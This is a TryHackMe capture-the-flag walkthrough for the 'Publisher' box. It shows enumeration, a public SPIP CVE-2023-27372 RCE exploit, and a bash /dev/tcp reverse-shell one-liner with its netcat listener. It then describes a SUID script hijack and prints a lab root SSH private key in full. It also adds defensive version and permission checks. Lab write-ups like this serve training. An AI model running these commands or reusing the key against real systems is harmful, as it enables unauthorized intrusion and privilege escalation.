Publisher TryHackMe Walkthrough

Musyoka Ian


Hello guys, welcome back to another walkthrough. This time we are tackling Publisher from TryHackMe, a nice beginner box by josemlwdf. We'll start off by enumerating open ports with nmap and find two of them open, namely SSH (port 22) and HTTP (port 80). The web application uses a CMS (Content Management System) called SPIP, and the installed version appears to be vulnerable to unauthenticated Remote Code Execution (RCE). We'll use an exploit from GitHub to get a shell on the box as the www-data user, escalate our privileges to the user think using a leaked SSH private key, and finally get root on the box by exploiting weak file permissions. Without further ado, let's begin.

Below is a brief description of this box given by the author

The “Publisher” CTF machine is a simulated environment hosting some services. Through a series of enumeration techniques, including directory fuzzing and version identification, a vulnerability is discovered, allowing for Remote Code Execution (RCE). Attempts to escalate privileges using a custom binary are hindered by restricted access to critical system files and directories, necessitating a deeper exploration into the system’s security profile to ultimately exploit a loophole that enables the execution of an unconfined bash shell and achieve privilege escalation.

As always, we'll start off by running an nmap scan on the box to discover the open ports. The command used was

nmap -sC -sV 10.10.242.225
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-29 13:04 EAT
Nmap scan report for 10.10.242.225
Host is up (0.28s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Publisher's Pulse: SPIP Insights & Tips
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.82 seconds

Above we can see the two open ports. (Always run a full port scan afterwards, since it is easy to miss open ports; I've missed some before while doing CTFs and boxes, though it isn't required on this box.) We cannot start with SSH enumeration because we need valid credentials, or at least a valid username, before a brute-force attack can be attempted, and most secure systems nowadays enforce password policies with a maximum number of failed login attempts followed by account lockout.

My focus will be on HTTP for now. On opening the web application we get a standard web page.

Running directory brute forcing with ffuf we find a directory called spip. The command used was

ffuf -u http://10.10.163.99/FUZZ -e .php,.txt -w  /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.10.163.99/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt
:: Extensions : .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 346ms]
images [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 333ms]
.html.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 332ms]
.html.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 335ms]
.htm.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 310ms]
.htm.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 310ms]
.htm [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 311ms]
.html [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 3015ms]
. [Status: 200, Size: 8686, Words: 1334, Lines: 151, Duration: 283ms]
.htaccess.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 293ms]
.htaccess [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 293ms]
.htaccess.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 296ms]
.phtml [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 296ms]
.htc [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 282ms]
.htc.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 283ms]
.htc.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 280ms]
.html_var_DE.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 289ms]
.html_var_DE.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 289ms]
.html_var_DE.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 289ms]
.html_var_DE [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 292ms]
spip [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 280ms]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 288ms]
.htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 277ms]
.htpasswd.php [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 284ms]
.htpasswd.txt [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 283ms]

Navigating to the /spip/ directory we get another article called publisher.

How did I identify which CMS it was? I just took spip.php and googled it.

Continuing to look through the pages we see that the application might be vulnerable to unauthenticated remote code execution.

We have now identified the CMS as SPIP, but which version is running? I found a SPIP CMS scanner on GitHub, though its last update was in 2015–2016. Below is the link to the scanner.

I figured the tool should have some way of identifying the CMS version, so I looked at its code to see how it does that, and the detect_version() function below sticks out like a sore thumb.

def detect_version(req):
    res = None  # added guard: without it, a missing header leaves res undefined
    # SPIP advertises itself in a Composed-By response header
    if 'composed-by' in req.headers:
        res = detect_version_with_header(req.headers['composed-by'])
    # fall back to fingerprinting the HTML body
    if not res:
        res = detect_version_in_html(req.content)
    if res:
        return res
    if opts.force:
        print("Doesn't seem to be a SPIP install!")
    else:
        raise Exception('Are you sure it is a SPIP install?')

So the Composed-By response header gives away the version of SPIP installed on the server. Looking at the requests passing through Burp Suite, we see that the version running on the server is 4.2.0.
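As an added illustration (not from the post, the scanner, or the box), here is a small Python check that does what the scanner's header branch does, but from the defender's side: it reads the version SPIP reveals in its Composed-By header and compares it with the first patched release, so you can inventory your own installs and see which ones advertise a vulnerable version. The header format ("SPIP <version> @ www.spip.net ...") and the fixed version 4.2.1 for CVE-2023-27372 are assumptions to confirm against the SPIP advisory; the sample response headers are constructed, not captured.

```python
import re

# Constructed sample response headers (not captured from the box). The format
# "SPIP <version> @ www.spip.net ..." for the Composed-By header is an assumption.
SAMPLE_HEADERS = {
    "Server": "Apache/2.4.41 (Ubuntu)",
    "Composed-By": "SPIP 4.2.0 @ www.spip.net + spip(4.2.0)",
}

# Assumed first release that fixes CVE-2023-27372; confirm with the vendor advisory.
FIXED_VERSION = "4.2.1"

VERSION_RE = re.compile(r"\bSPIP\s+(\d+(?:\.\d+)*)")


def version_from_headers(headers):
    """Return the SPIP version advertised in Composed-By, or None if absent."""
    # HTTP header names are case-insensitive, so normalise before the lookup.
    lowered = {name.lower(): value for name, value in headers.items()}
    value = lowered.get("composed-by")
    if not value:
        return None
    match = VERSION_RE.search(value)
    return match.group(1) if match else None


def parse_version(text):
    """'4.2.0' -> (4, 2, 0); tolerant of short forms such as '4.2'."""
    return tuple(int(part) for part in text.split("."))


def is_older_than(version, fixed):
    """True when version < fixed, comparing dotted numbers component-wise."""
    a, b = parse_version(version), parse_version(fixed)
    width = max(len(a), len(b))
    return a + (0,) * (width - len(a)) < b + (0,) * (width - len(b))


def assess(headers, fixed=FIXED_VERSION):
    """Summarise what the headers disclose and whether the version predates the fix."""
    version = version_from_headers(headers)
    return {
        "discloses_version": version is not None,
        "version": version,
        "predates_fix": version is not None and is_older_than(version, fixed),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_HEADERS))
```

Patching is the real fix; once an install is up to date, stripping the header at the web server (for Apache, `Header unset Composed-By` with mod_headers) removes the one-request fingerprint that the scanner relies on.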

The next step is looking for an exploit for that specific version of the application, and we found a GitHub page with one.

I git cloned the project to my local machine using the command below

git clone https://github.com/Chocapikk/CVE-2023-27372.git             
Cloning into 'CVE-2023-27372'...
remote: Enumerating objects: 25, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 25 (delta 4), reused 7 (delta 2), pack-reused 11
Receiving objects: 100% (25/25), 14.20 KiB | 156.00 KiB/s, done.
Resolving deltas: 100% (6/6), done.

Next I installed the required libraries using the following command

pip install -r requirements.txt

To run the tool I used the following command

python CVE-2023-27372.py -u http://10.10.163.99/spip/ -v -o report.txt

Looking at the screenshot below, we get remote code execution on the server.

Next is getting a reverse shell on the box, and the command I used was

bash -c "bash -i >& /dev/tcp/10.8.84.177/9001 0>&1"

After setting up a netcat listener on port 9001 we get a reverse shell

nc -nvlp 9001                                                      
listening on [any] 9001 ...
connect to [10.8.84.177] from (UNKNOWN) [10.10.163.99] 58864
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@41c976e507f8:/home/think/spip/spip$

We have a shell as the www-data user and we seem to have landed in a Docker container. Doing some manual enumeration we discover an SSH private key in think's home directory, and we have read access to it.

I copied the key to my box.

-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

Trying to SSH into the box with the key works, and we have escaped the Docker container. The command used was (ensure the private key file has the correct permissions first)

ssh -i think.ssh think@10.10.163.99

Running linpeas we find an SUID binary that seems to call a bash script which we have write access to.

Given that we can modify /opt/run_container.sh, I tried to see if I could read the root directory by changing the code in /opt/run_container.sh.

I made the changes and saved the script. On running the binary we see that we are able to list the root directory.
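The weakness here is a pair of conditions: a setuid binary and a helper script it runs that non-root users can write. The Python audit below is an added example (not from the post, linpeas, or the box) that checks exactly those mode bits, and also the private-key permission the earlier SSH step depends on. It builds its own files in a temporary directory, so the paths and modes are constructed stand-ins, not the box's real files.

```python
import os
import stat
import tempfile


def mode_report(path):
    """Read the mode bits of `path` and say who besides the owner can touch it."""
    st = os.stat(path)
    mode = st.st_mode
    return {
        "owner_uid": st.st_uid,
        "setuid": bool(mode & stat.S_ISUID),
        "group_writable": bool(mode & stat.S_IWGRP),
        "world_writable": bool(mode & stat.S_IWOTH),
        "group_or_world_readable": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
    }


def script_hijack_risk(binary, script):
    """A setuid binary is hijackable when the script it runs is writable by others."""
    b, s = mode_report(binary), mode_report(script)
    return b["setuid"] and (s["group_writable"] or s["world_writable"])


def key_permissions_ok(key_path):
    """OpenSSH refuses a private key that group or others can access: mode 0600 or stricter."""
    return (os.stat(key_path).st_mode & 0o077) == 0


def demo():
    """Construct a setuid binary, its helper script and a key file, then audit them."""
    workdir = tempfile.mkdtemp()
    binary = os.path.join(workdir, "setuid_helper")     # constructed stand-in for the SUID binary
    script = os.path.join(workdir, "run_container.sh")  # constructed stand-in for /opt/run_container.sh
    key = os.path.join(workdir, "id_rsa")               # constructed stand-in for the copied key
    for path in (binary, script, key):
        open(path, "w").close()
    os.chmod(binary, 0o4755)   # setuid bit set, as on the box's binary
    os.chmod(script, 0o777)    # the weak state: anyone can edit the script
    results = {"risky_before": script_hijack_risk(binary, script)}
    os.chmod(script, 0o755)    # the fix: only the owner may write it
    results["risky_after"] = script_hijack_risk(binary, script)
    os.chmod(key, 0o644)       # too open: group and others can read the key
    results["key_bad"] = key_permissions_ok(key)
    os.chmod(key, 0o600)       # what ssh -i expects
    results["key_ok"] = key_permissions_ok(key)
    for path in (binary, script, key):
        os.remove(path)
    os.rmdir(workdir)
    return results


if __name__ == "__main__":
    print(demo())
```

Mode bits are only half of the check on a real host: the script must also be owned by root, since a file's owner can always chmod it back, and the same goes for every directory on the path to it.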

Looking closely at the directory listing we see there is a .ssh directory. I checked whether it holds a private key by doing another directory listing.

We see a private key, most probably belonging to the root user.

I dumped the key by changing the script again, as seen below.

We get the root user's private key

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

We gave the key the appropriate permissions.

Then we tried to SSH into the box as the root user using the command

ssh -i root.ssh root@10.10.163.99

It works: we managed to log in to the box as the root user and get the flags.
